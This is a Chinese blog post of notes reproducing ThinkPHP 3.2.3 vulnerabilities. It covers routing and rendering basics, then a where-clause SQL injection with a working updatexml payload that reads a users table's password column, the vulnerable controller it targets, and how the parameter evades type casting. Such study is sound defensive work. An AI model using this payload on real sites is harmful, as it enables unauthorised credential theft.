Thinkphp3漏洞总结

2021-10-28

漏洞复现 / tp3

字数统计: 859 | 阅读时长≈ 3 分钟

调试环境

mbp+vscode+mamp pro

参 https://www.cnblogs.com/phonecom/p/10340038.html

TP3.2.3官方手册

控制器

控制器类的命名方式是：控制器名（驼峰法，首字母大写）+Controller

控制器文件的命名方式是：类名+class.php（类文件后缀）

默认的欢迎页面其实就是访问的Home模块下面的Index控制器类的index操作方法我们修改默认的index操作方法如下：

namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index(){
        echo 'hello,world!';
    }
}

访问

/home/index/index 就可以可看到 hello world

也可以访问

?m=Home&c=Index&a=index

?s=home/index/index
都相当于访问   /home/index/index

常用的方法 I M 等等方法

ThinkPHP中的常用方法汇总总结:M方法，D方法，U方法，I方法等等

https://www.kancloud.cn/manual/thinkphp/1721

渲染

也就是用 assign 和 display组合起来达到渲染的效果 (当然还有其它方法可以)

display()

this->display();后面没参数的话，提交到当前模块儿的当前方法.html（tpl下面的文件夹名字即是模块名，它下面的某个.html文件也就是提交到的方法.html）文件中展示。

this->display();里面传路径，也就是要展示的.html所在的路径。

assign()

this->assign($1,$2);$2即为传过来的参数（自己在本方法中定义的），$1为展示页面中需要的参数(即：display到的页面中传的参数)

控制器里这样写

渲染页面这样写

展示出来的效果如下图

数据库配置

/ThinkPHP/Conf/convention.php

ThinkPhp3.2.3缓存漏洞

https://blog.csdn.net/u010433704/article/details/103069229

需要S的缓存方法当前提比较鸡肋

Thinkphp3.2.3 where注入

payload

1	?id[where]=1 and 1=updatexml(1,concat(0x7e,(select password from users limit 1),0x7e),1)%23

条件代码如下就行 (使用get方式查询users表中id=? 的数据)

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {

    public function index(){
       $data = M('users')->find(I('GET.id'));
       var_dump($data);
    }
}

payload截图

首先正常输入 ?id=1’

流程为 id=1' -> I() -> find() -> _parseOptions() -> _parseType() 然后将我们的字符串清理了。要知道id参数被改变的时间点在_parseType()中，那进入这个方法要满足

1	if (isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join']))

_parseType 方法会进行强制类型转换所以我们需要绕过这个

protected function _parseType(&$data, $key)
{
    if (!isset($this->options['bind'][':' . $key]) && isset($this->fields['_type'][$key])) {
        $fieldType = strtolower($this->fields['_type'][$key]);
        if (false !== strpos($fieldType, 'enum')) {
            // 支持ENUM类型优先检测
        } elseif (false === strpos($fieldType, 'bigint') && false !== strpos($fieldType, 'int')) {
            $data[$key] = intval($data[$key]);
        } elseif (false !== strpos($fieldType, 'float') || false !== strpos($fieldType, 'double')) {
            $data[$key] = floatval($data[$key]);
        } elseif (false !== strpos($fieldType, 'bool')) {
            $data[$key] = (bool) $data[$key];
        }
    }